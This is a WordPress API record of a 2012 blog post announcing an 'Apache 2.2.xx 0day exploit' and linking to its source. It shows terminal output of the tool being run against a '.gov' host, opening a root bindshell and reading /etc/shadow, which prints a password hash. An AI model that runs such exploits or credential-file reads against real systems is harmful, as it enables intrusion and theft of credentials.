{"id":310,"date":"2012-04-01T03:39:48","date_gmt":"2012-04-01T01:39:48","guid":{"rendered":"http:\/\/blog.pi3.com.pl\/?p=310"},"modified":"2012-04-01T13:43:17","modified_gmt":"2012-04-01T11:43:17","slug":"apache-2-2-xx-0day-exploit","status":"publish","type":"post","link":"https:\/\/blog.pi3.com.pl\/?p=310","title":{"rendered":"Apache 2.2.xx 0day exploit"},"content":{"rendered":"<p>I haven&#8217;t been posting on this blog for a while. That doesn&#8217;t mean I&#8217;m not doing research &#8211; I&#8217;m just not a big fan of releasing anything, and most of my work stays private. Anyway, because Apache released a new version of their HTTP Server, one of my research projects was burned. The new version of Apache fixes a <strong><span style=\"text-decoration: underline;\">remote code execution<\/span><\/strong> vulnerability in the default installation! This vulnerability is quite old and has been exploited in the wild for the last 5 years \ud83d\ude42<\/p>\n<p>Since this vulnerability is now fixed and no longer a 0day, I decided to publish the exploit code for this bug. How does it work? See below:<\/p>\n<pre>pi3-darkstar ~ # gcc Apache_0day.c -o Apache_0day\r\npi3-darkstar ~ # .\/Apache_0day -h\r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Apache 2.2.xx 0day exploit\u00a0 (by Adam 'pi3' Zabrocki) ]=- :::...\r\n\r\n\u00a0\u00a0 \u00a0Usage: .\/Apache_0day &lt;options&gt;\r\n\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0Options:\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -v &lt;victim&gt;\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -p &lt;port&gt;\r\n\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0 -h this help screen\r\n\r\n\u00a0pi3-darkstar ~ # .\/Apache_0day -v xxx.gov\r\n\r\n\u00a0\u00a0 \u00a0...::: -=[ Apache 2.2.xx 0day exploit\u00a0 (by Adam 'pi3' Zabrocki) ]=- :::...\u00a0\r\n\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Host alive? ... YES!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Connecting... 
DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Checking server... VULNERABLE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Calculating zones... DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Let's play with APR allocator....................................................................................................\r\n................................................................................................................................................................\r\n.................................................................................................... DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Spawning childs................................................................................... DONE!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Addresses? ... YES!\r\n\u00a0 \u00a0 \u00a0 \u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] @APR child 1... DONE! (0xffffffffbffffe01)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u00a0 \u00a0 [+] @APR child 2... DONE! (0xffffffffbceffe01)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Trying ret-into-system...\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [+] Connecting to bindshell...\r\n\r\npi3 was here :-) Executing shell...\r\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Linux pi3-test 2.6.32.13-grsec #1 SMP Thu May 13 17:07:21 CEST 2010 i686 i686 i386 GNU\/Linux\r\n# cat \/etc\/shadow|head -1\r\nroot:$6$vxdYpCQF$0qPMKMwxwVxLGNSZbOUYxK0n33C2lxCPdQq5n5rtr70dNkNPjEWCmjvKCZOKVP.cOM2PMc3JtOruts7F53\/hp.:15104:0:::::\r\n# exit;!<\/pre>\n<p>Looks nice, doesn&#8217;t it? 
\ud83d\ude42 Now realize it was used in the wild for the last 5 years&#8230; so you had better check your machine for any rootkits that may have been installed \ud83d\ude42<\/p>\n<p>As I promised at the beginning of this post, here is the exploit code: <a href=\"http:\/\/site.pi3.com.pl\/priv\/apache_0day.c.txt\" target=\"_blank\">Apache 0day<\/a>.<\/p>\n<p>Best regards,<\/p>\n<p>Adam Zabrocki<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I haven&#8217;t been posting on this blog for a while. That doesn&#8217;t mean I&#8217;m not doing research &#8211; I&#8217;m just not a big fan of releasing anything, and most of my work stays private. Anyway, because Apache released a new version of their HTTP Server, one of my research projects was burned. The new version of Apache fixes [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4,5,1],"tags":[],"class_list":["post-310","post","type-post","status-publish","format-standard","hentry","category-bughunt","category-exploiting","category-o-wszystkim-i-o-niczym"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=310"}],"version-history":[{"count":10,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=\/wp\/v2\/posts\/310\/revisions"}],"predecessor-version":[{"id":321,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_r
oute=\/wp\/v2\/posts\/310\/revisions\/321"}],"wp:attachment":[{"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=310"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=310"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.pi3.com.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}